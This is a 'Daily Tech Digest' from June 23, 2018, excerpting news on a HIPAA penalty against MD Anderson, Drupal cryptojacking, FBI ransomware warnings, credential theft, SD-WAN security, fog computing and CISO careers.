Daily Tech Digest - June 23, 2018

$4.3 Million HIPAA Penalty for 3 Breaches

$4.3 Million HIPAA Penalty for 3 Breaches
"Despite the encryption policies and high risk findings, MD Anderson did not begin to adopt an enterprisewide solution to implement encryption of ePHI until 2011, and even then, it failed to encrypt its inventory of electronic devices containing ePHI between March 24, 2011, and January 25, 2013," the statement adds. The administrative law judge agreed with OCR's arguments and findings and upheld OCR's penalties for each day of MD Anderson's noncompliance with HIPAA and for each record of individuals breached, OCR notes. "OCR is serious about protecting health information privacy and will pursue litigation, if necessary, to hold entities responsible for HIPAA violations," says OCR Director Roger Severino. "We are pleased that the judge upheld our imposition of penalties because it underscores the risks entities take if they fail to implement effective safeguards, such as data encryption, when required to protect sensitive patient information." OCR alleges that MD Anderson claimed that it was not obligated to encrypt its devices and asserted that the ePHI at issue was for "research," and thus was not subject to HIPAA's nondisclosure requirements.



Cultural, leadership issues plague many digital transformation efforts

Digital transformation is a complex effort from the internal perspective, and to make it even more challenging, it shouldn’t appear to be that way from the customer perspective, explains James Campbell, practice lead with experience design at Shalom. “Some of the biggest challenges with internal forces – like buy-in and commitment from all functional areas, sponsorship from executives, board and other governing bodies, and willingness to redefine KPI’s – actually pale in comparison to the effort required to prevent your digital transformation from becoming your customer’s problem, too,” Campbell says. When organizations fail to realize that, poorly implemented digital transformation can cause lost sales, loyalty and public reputation, “and it can make or break the type of effort that will differentiate the companies of today from the companies of tomorrow,” Campbell says. “While many industries are considering digital transformation, CEOs in asset-intensive industries are less likely to consider IT a priority, and low levels of historic investment may have created an environment with poor digital readiness,” explains Allen E. Look


How The TOGAF® Standard Enables Agility


Top-down, The Enterprise Strategic Architecture provides a high-level view of the area of the enterprise impacted by change; the Capability Architectures are detailed descriptions of (increments of) capability to be delivered. These are Sprints in the agile world. They are sufficiently detailed to be handed to developers for action. As the diagram shows, sprints can occur in parallel. A key consideration is achieving is that the sprints are time-boxed and aimed at addressing a set of bounded objectives. The Capability architectures should be tightly scoped to address those objectives. The higher levels show the relationships and dependencies between capability increments and provide the framework for the management of risk of unanticipated consequences. They provide the information needed to assess the overall impact of a proposed change. Bottom-up, there is feedback from the implementation of capability increments which influences the higher levels. The enterprise strategic architecture may evolve as a result of experience gained from the deployment of each and every capability increment.


Silver Peak SD-WAN adds service chaining, partners for cloud security


These partnership additions build on Silver Peak's recent update to incorporate a drag-and-drop interface for service chaining and enhanced segmentation capabilities. For example, Silver Peak said a typical process starts with customers defining templates for security policies that specify segments for users and applications. This segmentation can be created based on users, applications or WAN services -- all within Silver Peak SD-WAN's Unity Orchestrator. Once the template is complete, Silver Peak SD-WAN launches and applies the security policies for those segments. These policies can include configurations for traffic steering, so specific traffic automatically travels through certain security VNFs, for example. Additionally, Silver Peak said customers can create failover procedures and policies for user access. Enterprises are increasingly moving their workloads to public cloud and SaaS environments, such as Salesforce or Microsoft Office 365. Securing that traffic -- especially traffic that travels directly over broadband internet connections -- remains top of mind for IT teams, however.


Musk says Tesla data leaked by disgruntled employee

“Could just be a random event, but as Andy Grove said, ‘Only the paranoid survive,’” Musk wrote Monday, referring to the late chairman and CEO of Intel Corp. “Please be on the alert for anything that’s not in the best interests of our company.” Tesla can ill afford manufacturing setbacks now. It’s racing to meet a target to build 5,000 Model 3s a week by the end of this month, a goal Musk told shareholders on June 5 that the company was “quite likely” to achieve. The company’s forecasts for generating profit and cash in the third and fourth quarters of this year are based on this objective, and falling short would reignite concerns about whether the company may need to raise more capital. A Tesla spokeswoman confirmed the authenticity of the Monday email, which CNBC reported first. Smoldering in an air filter in the welding area of Tesla’s body line was extinguished in a matter of seconds, she said. Production has resumed and there were no injuries or significant equipment damage, she added.


Three-month-old Drupal vulnerability is being used to deploy cryptojacking malware

The researchers note that this particular attack uses interesting techniques, including hiding behind the Tor network to evade detection. The malware also checks to see whether a previous miner is running on the system before installing the payload via a series of shell scripts and executables. As well as hiding behind the Tor network, the attacker or attackers are also using a Virtual Private Network (VPN) in an effort to hide their tracks, but there is a linked IP address. Researchers say there have been hundreds of attempts to conduct attacks via this IP over the last month, although not all involve the Drupal vulnerability: some are related to the Heartbleed vulnerability. There's no indication as to the exact number of cryptojacking attacks that have been conducted using the Drupal vulnerability, but it serves to remind organisations that they should be patching vulnerabilities -- especially those deemed critical -- in order to protect against attacks. "Patching and updating the Drupal core fixes the vulnerability that this threat exploits. 


FBI warns of increasing ransomware, firmware attacks


Along with those newer types of attacks, the tried-and-true insider threat also isn’t going away soon, said Morrison, speaking at the Hewlett Packard Enterprise Discover conference in Las Vegas on Wednesday. The organizations taking advantage of those attacks are increasingly sophisticated and well-funded criminal groups. “We need to get off the mindset that criminals are living in their basement, that a cybercriminal is some kid that’s living in the basement of their mom’s house,” Morrison said. “These are fully functional, 24/7 data center operations, operating in countries where they have some kind of asylum, in many cases.” About 75 percent of the cyberattacks against companies in the United States come from organized crime groups, Morrison added. “Understand that’s the magnitude of what you’re facing,” he told the audience. In some cases, these criminal organizations also have ties to nation states. “We’re seeing this blending of nation state and criminal organizations,” Morrison said. After all, “why would a nation state take a chance of being exposed when they can just hire a criminal group?”


Early detection of compromised credentials can greatly reduce impact of attacks


There is a growing industry in the cybercrime ecosystem focused on obtaining valid login credentials using multiple mechanisms and tools. These tools nowadays can be cheaply acquired in the underground, darknet markets and forums. And you don’t have to be a highly seasoned cybercriminal to launch an attack. According to our credential detection data, since the start of 2018 up until the end of May, there has been a 39 percent increase in the number of compromised credentials that we have detected from Europe and Russia, compared to the same period in 2017. In fact, Blueliv’s observations conclude that Europe and Russia make up half of the world’s credential theft victims. We also found that when we remove Russia from the dataset, the growth figure for European theft victims jumps to 62 percent. These European growth figures tracked by us are surprisingly higher than North America’s, which recorded a decline by almost half in this period. We think that these cybercriminal success rates mean that the credential theft industry is growing in the European region, both in innovation and scope. We believe there are several reasons for this.


Blockchains on mobile, IoT devices: Can fog computing make it happen?

Blockchains on mobile, IoT devices: Can fog computing make it happen?
Edge computing is a way to bring the processing center closer to the source of data, or the “edge,” significantly cutting down costs and processing time by tapping on a network of computers who are offering their storage and processing power to the network’s clients in exchange for pay. Edge computing doesn’t necessarily need to be blockchain-based, but in several ways, the two technologies overlap. In essence, they’re like blockchain miners, except anyone can use their processing power for any process at any given time—it could be mining, scientific calculations, video streaming, or anything else. Unlike blockchains, edge computing services are not limited to a specific use case. The quickest differentiator I’ve seen between edge and fog is from Cisco: “Fog computing is a standard that defines how edge computing should work, and it facilitates the operation of compute, storage and networking services between end devices and cloud computing data centers. Additionally, many use fog as a jumping-off point for edge computing.” Fog computing is another emerging technology that can make blockchains even more powerful than they already are.


CISO careers: Several factors propel high turnover


A CISO's role today is primarily risk management, where they are more of an advisor and strategist, while being technologist behind the scenes. Establishing a security risk steering committee with other C-suite members is one of several effective ways to engage with business leaders. The old ways of instilling fear, uncertainty and doubt to drive support for additional budget and large projects are long gone. The CISO should be perceived as a business partner, adaptable to the business changes and threats, a team player, and have a continuous improvement mindset across people, process and sometimes technology needs. Additionally, the CISO should be focused on self-improvement -- a coach and/or mentor are essential to becoming a very effective senior leader. Athletes at the highest levels always have a coach, often many coaches, from experts in their sport to nutritionists that keep them as healthy as possible. Why shouldn't CISOs? The CISO has one of the most challenging roles and should have both a senior business leader and an industry peer as mentors and, if the organization supports it, an executive coach to improve their leadership and organizational influence skill set.



Quote for the day:


"It is easier to act yourself into a new way of thinking, than it is to think yourself into a new way of acting." -- A.J. Jacobs